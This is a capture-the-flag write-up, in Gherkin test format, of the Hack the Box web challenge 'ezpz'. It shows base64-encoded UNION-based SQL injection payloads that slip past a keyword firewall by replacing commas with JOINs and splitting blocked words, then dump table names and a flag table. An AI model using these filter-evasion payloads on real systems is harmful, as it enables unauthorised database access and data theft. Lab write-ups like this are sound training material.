## Version 2.0
## language: en

Feature: ezpz - Web - Hack the Box
  Site:
    https://www.wechall.net/
  Category:
    Web
  User:
    arguoK
  Goal:
    Find secret word

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Ubuntu          | 16.04       |
    | Firefox         | 72.0.2      |
  Machine information:
    Given Webpage:
    """
    http://docker.hackthebox.eu:30477/
    """
    And A flag format of
    """
    HTB{$FLAG}
    """
    And Author clue "Can you get the flag?"

  Scenario: Fail: Parameter Injection
    Given the website
    When I look at it
    """
    Notice: Undefined index: obj in /var/www/html/index.php on line 27

    Notice: Trying to get property 'ID' of non-object
            in /var/www/html/index.php on line 29
    """
    Then I know page is in php
    And needs parameter "obj"
    When I add this Payload
    """
    Notice: Trying to get property 'ID' of non-object
            in /var/www/html/index.php on line 29
    """
    Then The first error is gone
    When I check the source code
    """
    <body bgcolor="A9A9A9">
      ...
      <!-- Hint : base64_encode($data)-->
    <\body>
    """
    Then I know the payload must be encoded in base64
    And I write a Python script to pass payloads as strings
    When I try the payload "{"ID": "1"}":
    """
    Good Luck,
    You've got that this is really gonna be an intersting challenge :)
    """
    Then I know the site is vulnerable to encoded SQL Injection
    When I try the payload "{"ID": "1' or 1-- -"}"
    """
    Good Luck,
    You've got that this is really gonna be an intersting challenge :)
    Avoid Tools, If you wan't to Enjoy the Challenge :v ..
    Go and Find the vulnerability ..
    """
    Then I can see a message that tells me go find the vulnerability
    And I did not capture the flag

  Scenario: Success: Correct SQLi Approach
    Given the website
    And the knowledge of previous Scenario
    When I try the payload
    """
    {"ID": "-1\' union select 1, 2"}
    """
    Then I get the response:
    """
    This request has been blocked by the server's application firewall
    """
    And I know the website has some firewall word protection
    When I execute a script to find unavailable words
    Then I know "," is a filtered special character
    When I use a join generated table instead of ","
    Then I can get database information using this method
    And I can elaborate a better injection in the new select
    When I use injection:
    """
    '{"ID": "-1\' union select *
    from ( (select 1)A join
    ( select table_name from information_schema.tables )B );#"}'
    """
    Then I get again the response:
    """
    This request has been blocked by the server's application firewall
    """
    And I execute the script to find the trouble words
    And the problem is "information_schema.tables"
    When I run the injection without filtered words:
    """
    '{"ID": "-1\' union select *
    from ( (select 1)A join
    ( select table_name from information_schema.  tables )B );#"}'
    """
    Then the firewall cant block the injection
    And I can see all the tables names
    """
    ...
    variablesINNODB_FT_INDEX_CACHEINNODB_SYS_FOREIGN_COLSINNODB_FT_BEING
    DELETEDINNODB_BUFFER_POOL_STATSINNODB_TRXINNODB_SYS_FOREIGNINNODB_SYS
    TABLESINNODB_FT_DEFAULT_STOPWORDINNODB_FT_CONFIGINNODB_BUFFER_PAGEINNODB
    SYS_TABLESPACESINNODB_METRICSINNODB_SYS_INDEXESINNODB_SYS_VIRTUALINNODB
    TABLESPACES_SCRUBBINGINNODB_SYS_SEMAPHORE
    WAITSDATA FlagTableUnguessableEzPZ column_statscolumns_
    privdbeventfuncgeneral logglobal_privgtid_slave_poshelp_categoryhelp
    topicindex_statsinnodb_index_statsinnodb_table_statspluginprocprocs
    privproxies_privroles_mappingserversslow_logtable_statstables_privtime
    zonetime_zone_leap_secondtime_zone_nametime_zone_transitiontime_zone
    ...
    """
    When I inspect "FlagTableUnguessableEzPZ" using the injection:
    """
    "{"ID": "-1\' union select * from
    ( (select 1)A join ( select * from FlagTableUnguessableEzPZ )B );#"}"
    """
    Then I can see the format "HTB{}" [evidence](img1.jpg)
    And I captured the flag
